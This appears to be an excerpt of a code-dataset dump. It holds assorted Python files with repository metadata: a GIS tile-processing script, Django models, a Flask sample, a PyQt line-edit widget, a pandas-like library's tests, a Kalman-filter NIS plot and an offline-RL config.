description='Analyse images using the range of tools provided',
long_description=long_description,
author='J.MacGrillen',
scripts=[],
packages=find_packages(exclude=['tests*']),
include_package_data=True,
install_requires=install_requirements,
license="MIT License",
python_requires=">= 3.7.*",
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
],
)
if __name__ == "__main__":
setup_perspective_package()
| 25.344828
| 71
| 0.593197
| 144
| 1,470
| 5.895833
| 0.652778
| 0.053004
| 0.040047
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008547
| 0.283673
| 1,470
| 57
| 72
| 25.789474
| 0.797721
| 0.202041
| 0
| 0
| 0
| 0
| 0.334234
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0
| 0.029412
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c943169325309fd0984d9e08fbc50df17f771916
| 2,159
|
py
|
Python
|
etl/vector/process_all.py
|
nismod/oi-risk-vis
|
a5c7460a8060a797dc844be95d5c23689f42cd17
|
[
"MIT"
] | 2
|
2020-09-29T15:52:48.000Z
|
2021-03-31T02:58:53.000Z
|
etl/vector/process_all.py
|
nismod/oi-risk-vis
|
a5c7460a8060a797dc844be95d5c23689f42cd17
|
[
"MIT"
] | 41
|
2021-05-12T17:12:14.000Z
|
2022-03-17T10:49:20.000Z
|
etl/vector/process_all.py
|
nismod/infra-risk-vis
|
1e5c28cced578d8bd9c78699e9038ecd66f47cf7
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
from argparse import ArgumentParser
import csv
import os
from pathlib import Path
import subprocess
import sys
this_directory = Path(__file__).parent.resolve()
vector_script_path = this_directory / 'prepare_vector.sh'
def run_single_processing(in_file_path: Path, out_file_path: Path, layer_name: str, output_layer_name: str, spatial_type: str, where_filter: str, **kwargs):
print(f'Processing vector "{in_file_path}" -> "{out_file_path}"')
command = f'{vector_script_path} "{in_file_path}" "{out_file_path}" "{output_layer_name}" "{spatial_type}" "{layer_name}" "{where_filter}"'
print(f"Running command: {command}", flush=True)
subprocess.run(command, shell=True, stdout=sys.stdout, stderr=sys.stderr)
def process_vector_datasets(raw: Path, out: Path):
infrastructure_dir = raw / 'networks'
csv_path = infrastructure_dir / 'network_layers.csv'
assert csv_path.is_file(), f"{csv_path} is not a file"
with csv_path.open() as f:
reader = csv.DictReader(f)
assert 'path' in reader.fieldnames
assert 'layer_name' in reader.fieldnames
assert 'spatial_type' in reader.fieldnames
assert 'where_filter' in reader.fieldnames
assert 'output_layer_name' in reader.fieldnames
for row in reader:
in_file_path = raw / row['path']
output_layer_name = row['output_layer_name']
out_file_path = out / f"{output_layer_name}.mbtiles"
if os.path.exists(out_file_path) and (os.path.getmtime(in_file_path) < os.path.getmtime(out_file_path)):
print("Skipping", out_file_path)
continue
run_single_processing(in_file_path, out_file_path, **row)
if __name__ == '__main__':
parser = ArgumentParser(description='Converts all vector datasets to GeoJSON and then to MBTILES')
parser.add_argument('--raw', type=Path, help='Root of the raw data directory. Assumes a file network_layers.csv exists in the dir.', required=True)
parser.add_argument('--out', type=Path, help='Directory in which to store results of the processing', required=True)
args = parser.parse_args()
process_vector_datasets(args.raw.expanduser().resolve(), args.out.expanduser().resolve())
| 41.519231
| 156
| 0.742937
| 314
| 2,159
| 4.828025
| 0.305732
| 0.073879
| 0.058047
| 0.039578
| 0.108839
| 0.073219
| 0
| 0
| 0
| 0
| 0
| 0.000539
| 0.13988
| 2,159
| 51
| 157
| 42.333333
| 0.815832
| 0.007874
| 0
| 0
| 0
| 0.026316
| 0.279776
| 0.022419
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.052632
| false
| 0
| 0.157895
| 0
| 0.210526
| 0.078947
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c944a392c3c65b876eac48378aa9aaaa59c4cea9
| 1,688
|
py
|
Python
|
django/week9/main/models.py
|
yrtby/Alotech-Fullstack-Bootcamp-Patika
|
e2fd775e2540b8d9698dcb7dc38f84a6d7912e8d
|
[
"MIT"
] | 1
|
2021-11-05T09:45:25.000Z
|
2021-11-05T09:45:25.000Z
|
django/week9/main/models.py
|
yrtby/Alotech-Fullstack-Bootcamp-Patika
|
e2fd775e2540b8d9698dcb7dc38f84a6d7912e8d
|
[
"MIT"
] | null | null | null |
django/week9/main/models.py
|
yrtby/Alotech-Fullstack-Bootcamp-Patika
|
e2fd775e2540b8d9698dcb7dc38f84a6d7912e8d
|
[
"MIT"
] | 3
|
2021-11-07T07:16:30.000Z
|
2021-12-07T20:22:59.000Z
|
from django.db import models
from django.contrib.auth.models import User
from django.core.validators import MinLengthValidator
# Create your models here.
class Post(models.Model):
image = models.ImageField(upload_to='uploads/')
content = models.TextField(max_length=200, validators=[MinLengthValidator(10)])
author = models.ForeignKey(User, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return f"Post '{self.content}' shared by '{self.author.username}'"
@property
def likes_count(self):
if hasattr(self, '_likes_count'):
return self.like_set.count()
self._likes_count = self.like_set.count()
return self.like_set.count()
@property
def comments_count(self):
if hasattr(self, '_comments_count'):
return self.comment_set.count()
self._comments_count = self.comment_set.count()
return self.comment_set.count()
class Like(models.Model):
post = models.ForeignKey(Post, on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return f"Post '{self.post.content}' liked by '{self.user.username}'"
class Comment(models.Model):
post = models.ForeignKey(Post, on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
content = models.TextField(max_length=200, validators=[MinLengthValidator(10)])
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return f"Post '{self.post.content}' commented by '{self.user.username}'"
| 35.914894
| 83
| 0.708531
| 217
| 1,688
| 5.304147
| 0.271889
| 0.046916
| 0.060817
| 0.091225
| 0.653345
| 0.615117
| 0.516073
| 0.516073
| 0.516073
| 0.404865
| 0
| 0.007174
| 0.174171
| 1,688
| 46
| 84
| 36.695652
| 0.818508
| 0.014218
| 0
| 0.514286
| 0
| 0
| 0.126955
| 0.066185
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.085714
| 0.085714
| 0.828571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9463207e60b37b4cf9f338b3635a5669f81cf71
| 286
|
py
|
Python
|
codewars/6kyu/dinamuh/CountingDuplicates/main.py
|
dinamuh/Training_one
|
d18e8fb12608ce1753162c20252ca928c4df97ab
|
[
"MIT"
] | null | null | null |
codewars/6kyu/dinamuh/CountingDuplicates/main.py
|
dinamuh/Training_one
|
d18e8fb12608ce1753162c20252ca928c4df97ab
|
[
"MIT"
] | 2
|
2019-01-22T10:53:42.000Z
|
2019-01-31T08:02:48.000Z
|
codewars/6kyu/dinamuh/CountingDuplicates/main.py
|
dinamuh/Training_one
|
d18e8fb12608ce1753162c20252ca928c4df97ab
|
[
"MIT"
] | 13
|
2019-01-22T10:37:42.000Z
|
2019-01-25T13:30:43.000Z
|
def duplicate_count(text):
x = set()
y = set()
for char in text:
char = char.lower()
if char in x:
y.add(char)
x.add(char)
return len(y)
def duplicate_count2(s):
return len([c for c in set(s.lower()) if s.lower().count(c) > 1])
| 20.428571
| 69
| 0.527972
| 47
| 286
| 3.170213
| 0.404255
| 0.161074
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010363
| 0.325175
| 286
| 13
| 70
| 22
| 0.761658
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0
| 0.090909
| 0.363636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c947e59db3be68e0dcce4600b6cfeb33b848886c
| 375
|
py
|
Python
|
tests/test_dir_dataset.py
|
gimlidc/igre
|
bf3425e838cca3d1fa8254a2550ecb44774ee0ef
|
[
"MIT"
] | 1
|
2021-09-24T09:12:06.000Z
|
2021-09-24T09:12:06.000Z
|
tests/test_dir_dataset.py
|
gimlidc/igre
|
bf3425e838cca3d1fa8254a2550ecb44774ee0ef
|
[
"MIT"
] | null | null | null |
tests/test_dir_dataset.py
|
gimlidc/igre
|
bf3425e838cca3d1fa8254a2550ecb44774ee0ef
|
[
"MIT"
] | null | null | null |
import stable.modalities.dir_dataset as dataset
import os.path
def test_load_all_images():
srcdir = os.path.join("tests", "assets")
data, metadata = dataset.load_all_images(srcdir)
assert metadata["resolutions"] == [(125, 140)]
assert data[0].shape[2] == 2
assert metadata["filenames"][0] == ["mari_magdalena-detail.png", "mari_magdalenaIR-detail.png"]
| 34.090909
| 99
| 0.706667
| 51
| 375
| 5.039216
| 0.627451
| 0.046693
| 0.101167
| 0.14786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03096
| 0.138667
| 375
| 10
| 100
| 37.5
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0.221333
| 0.138667
| 0
| 0
| 0
| 0
| 0.375
| 1
| 0.125
| false
| 0
| 0.25
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c949f74729063705c3b6e636bb65a45813ce66bb
| 1,118
|
py
|
Python
|
sample/main.py
|
qjw/flasgger
|
d43644da1fea6af596ff0e2f11517b578377850f
|
[
"MIT"
] | 5
|
2018-03-07T03:54:36.000Z
|
2022-01-01T04:43:48.000Z
|
sample/main.py
|
qjw/flasgger
|
d43644da1fea6af596ff0e2f11517b578377850f
|
[
"MIT"
] | null | null | null |
sample/main.py
|
qjw/flasgger
|
d43644da1fea6af596ff0e2f11517b578377850f
|
[
"MIT"
] | 2
|
2021-11-11T08:48:39.000Z
|
2022-01-01T04:43:49.000Z
|
import logging
import jsonschema
from flask import Flask, jsonify
from flask import make_response
from flasgger import Swagger
from sample.config import Config
def init_logging(app):
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
handler.setFormatter(logging.Formatter(
'%(asctime)s %(levelname)s [%(pathname)s:%(lineno)s] - %(message)s'))
app.logger.setLevel(logging.INFO)
app.logger.addHandler(handler)
if app.debug:
sa_logger = logging.getLogger('sqlalchemy.engine')
sa_logger.setLevel(logging.INFO)
sa_logger.addHandler(handler)
app = Flask(__name__)
app.config.update(Config or {})
init_logging(app)
Swagger(app)
@app.errorhandler(jsonschema.ValidationError)
def handle_bad_request(e):
return make_response(jsonify(code=400,
message=e.schema.get('error', '参数校验错误'),
details=e.message,
schema=str(e.schema)), 200)
from sample.api import api
app.register_blueprint(api, url_prefix='/api/v123456')
if __name__=='__main__':
app.run()
| 25.409091
| 77
| 0.675313
| 135
| 1,118
| 5.422222
| 0.459259
| 0.061475
| 0.077869
| 0.068306
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013575
| 0.209302
| 1,118
| 44
| 78
| 25.409091
| 0.81448
| 0
| 0
| 0
| 0
| 0.032258
| 0.100983
| 0.022341
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.225806
| 0.032258
| 0.322581
| 0.032258
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c94abc02ec26c5e120241965ee1760edb37aa362
| 909
|
py
|
Python
|
cuticle_analysis/models/e2e.py
|
ngngardner/cuticle_analysis
|
7ef119d9ee407df0faea63705dcea76d9f42614b
|
[
"MIT"
] | null | null | null |
cuticle_analysis/models/e2e.py
|
ngngardner/cuticle_analysis
|
7ef119d9ee407df0faea63705dcea76d9f42614b
|
[
"MIT"
] | 4
|
2021-07-02T17:49:44.000Z
|
2021-09-27T01:06:41.000Z
|
cuticle_analysis/models/e2e.py
|
ngngardner/cuticle_analysis
|
7ef119d9ee407df0faea63705dcea76d9f42614b
|
[
"MIT"
] | null | null | null |
import numpy as np
from .cnn import CNN
from .kviews import KViews
from .. import const
class EndToEnd():
def __init__(
self,
bg_model: CNN,
rs_model: KViews
) -> None:
self.name = 'EndToEnd'
self.bg_model = bg_model
self.rs_model = rs_model
def metadata(self):
return self.bg_model.metadata() + self.rs_model.metadata()
def predict(self, image: np.ndarray) -> np.ndarray:
# first find background
preds = self.bg_model.predict(image)
# cuticle detected, so use rs_model
if preds.any() == const.BG_LABEL_MAP['cuticle']:
idx = np.where(preds == 1)
rs_preds = self.rs_model.predict(image[idx])
# remap (0, 1) to (1, 2)
mp = {0: 1, 1: 2}
rs_preds = np.array([mp[i] for i in rs_preds])
preds[idx] = rs_preds
return preds
| 24.567568
| 66
| 0.567657
| 124
| 909
| 3.991935
| 0.379032
| 0.084848
| 0.088889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014587
| 0.321232
| 909
| 36
| 67
| 25.25
| 0.787682
| 0.085809
| 0
| 0
| 0
| 0
| 0.01816
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.166667
| 0.041667
| 0.416667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c950e89a11e706b3a1a0ba3575143820351f7247
| 3,337
|
py
|
Python
|
upandas_test.py
|
kokes/upandas
|
f2150e5a74c815b27fd08fc841da01c3b455dadc
|
[
"MIT"
] | null | null | null |
upandas_test.py
|
kokes/upandas
|
f2150e5a74c815b27fd08fc841da01c3b455dadc
|
[
"MIT"
] | null | null | null |
upandas_test.py
|
kokes/upandas
|
f2150e5a74c815b27fd08fc841da01c3b455dadc
|
[
"MIT"
] | null | null | null |
import sys, os
import upandas as upd
# Run a single Python script
# For many simple, single file projects, you may find it inconvenient
# to write a complete Dockerfile. In such cases, you can run a Python
# script by using the Python Docker image directly:
# versions to consider: 3 (600+ MB), slim (150 MB) alpine (90 MB)
# $ docker run -it --rm --name my-running-script -v "$PWD":/usr/src/myapp -w /usr/src/myapp python:3 python your-daemon-or-script.py
# $ docker run -it --rm -v "$PWD":/usr/src/upandas -w /usr/src/upandas python:alpine python upandas_test.py
if __name__ == '__main__':
if len(sys.argv) < 2:
print('no testing approach supplied, see...')
sys.exit(1)
env = sys.argv[1]
if env == 'local':
print('Testing locally')
elif env == 'docker':
print('Using docker to test')
ex = os.system(
'docker run -it --rm -v "$PWD":/usr/src/upandas -w /usr/src/upandas '
'python:alpine python upandas_test.py local')
sys.exit(os.WEXITSTATUS(ex))
elif env == 'virtualenv':
raise NotImplementedError
else:
print('Unsupported environment: {}'.format(env))
sys.argv = sys.argv[:1] # strip our settings out
import unittest
import math
skip_pandas_tests = True # TODO: make this explicit in the sys.argv stuff above
try:
import pandas as pd
skip_pandas_tests = False
except:
pass
# Series methods
# ==============
class TestSeriesInit(unittest.TestCase):
# dict, list, single value, another series, iterator
def test_basic_init(self):
samples = [[1, 2, 3], [4, 5, 6],
list(range(1000)), [1, None, 2, None], []]
for ds in samples:
s = upd.Series(ds)
self.assertEqual(len(s), len(ds))
# test shapes
self.assertEqual(len(s), s.shape[0])
self.assertEqual(len(s.shape), 1)
self.assertEqual(type(s.shape), tuple)
for j, el in enumerate(s):
self.assertEqual(el, ds[j])
if not skip_pandas_tests:
pass
# TODO: add a function to compare pd.Series and upd.Series
# spd = pd.Series(ds)
# self.assertEqual([j for j in s], [j for j in spd])
class TestSeriesApply(unittest.TestCase):
# TODO: args, kwargs?
def test_apply(self):
s = upd.Series([1, 2, 3])
s = s.apply(lambda x: x**2 - 3)
self.assertEqual(s.values, [-2, 1, 6])
class TestSeriesCopy(unittest.TestCase):
def test_copy(self):
s = upd.Series([1, 2, 3])
sc = s.copy()
self.assertEqual(s.values, sc.values)
sc[0] = 10
self.assertNotEqual(s.values,
sc.values) # TODO: add comparisons of frames?
def test_deep_copy(self): # ...or lack thereof
s = upd.Series([1, 2, {'foo': 'bar'}])
sc = s.copy()
sc[2]['foo'] = 'baz'
self.assertEqual(s[2]['foo'], sc[2]['foo'])
class TestSeriesValues(unittest.TestCase):
def test_values(self):
samples = [[1, 2, 3], [4, 5, 6],
list(range(1000)), [1, None, 2, None], []]
for ds in samples:
s = upd.Series(ds)
self.assertEqual(s.values, ds)
if __name__ == '__main__':
unittest.main()
| 29.530973
| 132
| 0.574768
| 462
| 3,337
| 4.084416
| 0.361472
| 0.079491
| 0.026497
| 0.020668
| 0.189719
| 0.18336
| 0.18336
| 0.165342
| 0.165342
| 0.165342
| 0
| 0.024759
| 0.285886
| 3,337
| 112
| 133
| 29.794643
| 0.7671
| 0.264309
| 0
| 0.231884
| 0
| 0.014493
| 0.107598
| 0.009446
| 0
| 0
| 0
| 0.008929
| 0.144928
| 1
| 0.072464
| false
| 0.028986
| 0.072464
| 0
| 0.202899
| 0.057971
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c953f88756774d3e9d070501efa3054134aaa4e2
| 6,555
|
py
|
Python
|
prettyqt/widgets/lineedit.py
|
phil65/PrettyQt
|
26327670c46caa039c9bd15cb17a35ef5ad72e6c
|
[
"MIT"
] | 7
|
2019-05-01T01:34:36.000Z
|
2022-03-08T02:24:14.000Z
|
prettyqt/widgets/lineedit.py
|
phil65/PrettyQt
|
26327670c46caa039c9bd15cb17a35ef5ad72e6c
|
[
"MIT"
] | 141
|
2019-04-16T11:22:01.000Z
|
2021-04-14T15:12:36.000Z
|
prettyqt/widgets/lineedit.py
|
phil65/PrettyQt
|
26327670c46caa039c9bd15cb17a35ef5ad72e6c
|
[
"MIT"
] | 5
|
2019-04-17T11:48:19.000Z
|
2021-11-21T10:30:19.000Z
|
from __future__ import annotations
from typing import Literal
from prettyqt import constants, core, gui, widgets
from prettyqt.qt import QtCore, QtWidgets
from prettyqt.utils import InvalidParamError, bidict
ECHO_MODE = bidict(
normal=QtWidgets.QLineEdit.EchoMode.Normal,
no_echo=QtWidgets.QLineEdit.EchoMode.NoEcho,
password=QtWidgets.QLineEdit.EchoMode.Password,
echo_on_edit=QtWidgets.QLineEdit.EchoMode.PasswordEchoOnEdit,
)
EchoModeStr = Literal["normal", "no_echo", "password", "echo_on_edit"]
ACTION_POSITION = bidict(
leading=QtWidgets.QLineEdit.ActionPosition.LeadingPosition,
trailing=QtWidgets.QLineEdit.ActionPosition.TrailingPosition,
)
ActionPositionStr = Literal["leading", "trailing"]
QtWidgets.QLineEdit.__bases__ = (widgets.Widget,)
class LineEdit(QtWidgets.QLineEdit):
focusLost = core.Signal()
enterPressed = core.Signal()
editComplete = core.Signal(str)
value_changed = core.Signal(str)
def __init__(
self,
default_value: str = "",
read_only: bool = False,
parent: QtWidgets.QWidget | None = None,
):
super().__init__(default_value, parent)
self.textChanged.connect(self._set_validation_color)
self.textChanged.connect(self.value_changed)
self.set_read_only(read_only)
def __repr__(self):
return f"{type(self).__name__}: {self.serialize_fields()}"
def __setstate__(self, state):
super().__setstate__(state)
self.set_text(state["text"])
self.setValidator(state["validator"])
self.setInputMask(state["input_mask"])
self.setMaxLength(state["max_length"])
self.setPlaceholderText(state["placeholder_text"])
self.setReadOnly(state["read_only"])
self.setFrame(state["has_frame"])
self.setClearButtonEnabled(state["clear_button_enabled"])
# self.setAlignment(state["alignment"])
self.set_cursor_move_style(state["cursor_move_style"])
self.set_echo_mode(state["echo_mode"])
self.setCursorPosition(state["cursor_position"])
self.setDragEnabled(state["drag_enabled"])
self.setModified(state["is_modified"])
def __reduce__(self):
return type(self), (), self.__getstate__()
def __add__(self, other: str):
self.append_text(other)
return self
def serialize_fields(self):
return dict(
text=self.text(),
# alignment=self.alignment(),
validator=self.validator(),
max_length=self.maxLength(),
read_only=self.isReadOnly(),
input_mask=self.inputMask(),
has_frame=self.hasFrame(),
placeholder_text=self.placeholderText(),
clear_button_enabled=self.isClearButtonEnabled(),
cursor_move_style=self.get_cursor_move_style(),
echo_mode=self.get_echo_mode(),
cursor_position=self.cursorPosition(),
drag_enabled=self.dragEnabled(),
is_modified=self.isModified(),
)
def focusOutEvent(self, event):
self.focusLost.emit()
return super().focusOutEvent(event)
def keyPressEvent(self, event):
if event.key() in [QtCore.Qt.Key.Key_Enter, QtCore.Qt.Key.Key_Return]:
self.enterPressed.emit()
return super().keyPressEvent(event)
def _on_edit_complete(self):
self.editComplete.emit(self.text())
def font(self) -> gui.Font:
return gui.Font(super().font())
def append_text(self, text: str):
self.set_text(self.text() + text)
def set_text(self, text: str):
self.setText(text)
def set_read_only(self, value: bool = True):
"""Set text to read-only.
Args:
value: True, for read-only, otherwise False
"""
self.setReadOnly(value)
def set_regex_validator(self, regex: str, flags=0) -> gui.RegularExpressionValidator:
validator = gui.RegularExpressionValidator(self)
validator.set_regex(regex, flags)
self.set_validator(validator)
return validator
def set_range(self, lower: int | None, upper: int | None):
val = gui.IntValidator()
val.set_range(lower, upper)
self.set_validator(val)
def set_validator(self, validator: gui.Validator):
self.setValidator(validator)
self._set_validation_color()
def set_input_mask(self, mask: str):
self.setInputMask(mask)
def _set_validation_color(self, state: bool = True):
color = "orange" if not self.is_valid() else None
self.set_background_color(color)
def set_echo_mode(self, mode: EchoModeStr):
"""Set echo mode.
Args:
mode: echo mode to use
Raises:
InvalidParamError: invalid echo mode
"""
if mode not in ECHO_MODE:
raise InvalidParamError(mode, ECHO_MODE)
self.setEchoMode(ECHO_MODE[mode])
def get_echo_mode(self) -> EchoModeStr:
"""Return echo mode.
Returns:
echo mode
"""
return ECHO_MODE.inverse[self.echoMode()]
def set_cursor_move_style(self, style: constants.CursorMoveStyleStr):
"""Set cursor move style.
Args:
style: cursor move style to use
Raises:
InvalidParamError: invalid cursor move style
"""
if style not in constants.CURSOR_MOVE_STYLE:
raise InvalidParamError(style, constants.CURSOR_MOVE_STYLE)
self.setCursorMoveStyle(constants.CURSOR_MOVE_STYLE[style])
def get_cursor_move_style(self) -> constants.CursorMoveStyleStr:
"""Return cursor move style.
Returns:
cursor move style
"""
return constants.CURSOR_MOVE_STYLE.inverse[self.cursorMoveStyle()]
def add_action(
self, action: QtWidgets.QAction, position: ActionPositionStr = "trailing"
):
self.addAction(action, ACTION_POSITION[position])
def set_value(self, value: str):
self.setText(value)
def get_value(self) -> str:
return self.text()
def is_valid(self) -> bool:
return self.hasAcceptableInput()
if __name__ == "__main__":
app = widgets.app()
widget = LineEdit()
action = widgets.Action(text="hallo", icon="mdi.folder")
widget.add_action(action)
widget.setPlaceholderText("test")
widget.setClearButtonEnabled(True)
# widget.set_regex_validator("[0-9]+")
widget.setFont(gui.Font("Consolas"))
widget.show()
app.main_loop()
| 31.066351
| 89
| 0.653547
| 725
| 6,555
| 5.673103
| 0.242759
| 0.031121
| 0.054705
| 0.023098
| 0.026258
| 0
| 0
| 0
| 0
| 0
| 0
| 0.000599
| 0.236156
| 6,555
| 210
| 90
| 31.214286
| 0.820851
| 0.076888
| 0
| 0.014599
| 0
| 0
| 0.05046
| 0.008012
| 0
| 0
| 0
| 0
| 0
| 1
| 0.189781
| false
| 0.021898
| 0.036496
| 0.043796
| 0.350365
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c95465582eabaa7004deb1d71c383aba26908941
| 1,086
|
py
|
Python
|
nis_visualizeer/ukf-nis-vis.py
|
vikram216/unscented-kalman-filter
|
1619fe365c73f198b39fa1de70fd5e203f8715a0
|
[
"MIT"
] | null | null | null |
nis_visualizeer/ukf-nis-vis.py
|
vikram216/unscented-kalman-filter
|
1619fe365c73f198b39fa1de70fd5e203f8715a0
|
[
"MIT"
] | null | null | null |
nis_visualizeer/ukf-nis-vis.py
|
vikram216/unscented-kalman-filter
|
1619fe365c73f198b39fa1de70fd5e203f8715a0
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
"""
A chi square (X2) statistic is used to investigate whether distributions
of categorical variables differ from one another. Here we consider 3 degrees
of freedom for our system. Plotted against 95% line"""
lidar_nis = []
with open('NISvals_laser.txt') as f:
for line in f:
lidar_nis.append(line.strip())
print("Number of LIDAR Measurements :\t", len(lidar_nis))
radar_nis = []
with open('NISvals_radar.txt') as f:
for line in f:
radar_nis.append(line.strip())
print("Number of RADAR Measurements :\t", len(radar_nis))
k = [7.815 for x in range(len(lidar_nis))]
# We skip the first row to cut out the unrealistically high NIS value
# from the first measurement. The Kalman filter has not found its groove yet.
lidar_nis = lidar_nis[1:]
radar_nis = radar_nis[1:]
plt.plot(lidar_nis)
plt.plot(k)
plt.title("LIDAR NIS")
plt.xlabel("Measurement Instance")
plt.ylabel("NIS")
plt.show()
plt.plot(radar_nis)
plt.plot(k)
plt.title("RADAR NIS")
plt.xlabel("Measurement Instance")
plt.ylabel("NIS")
plt.ylim(0, 20)
plt.show()
| 24.681818
| 78
| 0.721915
| 181
| 1,086
| 4.248619
| 0.475138
| 0.083225
| 0.028609
| 0.046814
| 0.291287
| 0.291287
| 0.241873
| 0.119636
| 0.119636
| 0
| 0
| 0.014161
| 0.154696
| 1,086
| 43
| 79
| 25.255814
| 0.823529
| 0.133518
| 0
| 0.37037
| 0
| 0
| 0.221918
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.037037
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c95546315e55dfb705f35c46c08aaa6f9bae96a5
| 695
|
py
|
Python
|
benchmark/OfflineRL/offlinerl/config/algo/crr_config.py
|
ssimonc/NeoRL
|
098c58c8e4c3e43e67803f6384619d3bfe7fce5d
|
[
"Apache-2.0"
] | 50
|
2021-02-07T08:10:28.000Z
|
2022-03-25T09:10:26.000Z
|
benchmark/OfflineRL/offlinerl/config/algo/crr_config.py
|
ssimonc/NeoRL
|
098c58c8e4c3e43e67803f6384619d3bfe7fce5d
|
[
"Apache-2.0"
] | 7
|
2021-07-29T14:58:31.000Z
|
2022-02-01T08:02:54.000Z
|
benchmark/OfflineRL/offlinerl/config/algo/crr_config.py
|
ssimonc/NeoRL
|
098c58c8e4c3e43e67803f6384619d3bfe7fce5d
|
[
"Apache-2.0"
] | 4
|
2021-04-01T16:30:15.000Z
|
2022-03-31T17:38:05.000Z
|
import torch
from offlinerl.utils.exp import select_free_cuda
task = "Hopper-v3"
task_data_type = "low"
task_train_num = 99
seed = 42
device = 'cuda'+":"+str(select_free_cuda()) if torch.cuda.is_available() else 'cpu'
obs_shape = None
act_shape = None
max_action = None
hidden_features = 256
hidden_layers = 2
atoms = 21
advantage_mode = 'mean'
weight_mode = 'exp'
advantage_samples = 4
beta = 1.0
gamma = 0.99
batch_size = 1024
steps_per_epoch = 1000
max_epoch = 200
lr = 1e-4
update_frequency = 100
#tune
params_tune = {
"beta" : {"type" : "continuous", "value": [0.0, 10.0]},
}
#tune
grid_tune = {
"advantage_mode" : ['mean', 'max'],
"weight_mode" : ['exp', 'binary'],
}
| 16.547619
| 83
| 0.680576
| 106
| 695
| 4.216981
| 0.660377
| 0.044743
| 0.06264
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066087
| 0.172662
| 695
| 41
| 84
| 16.95122
| 0.711304
| 0.011511
| 0
| 0
| 0
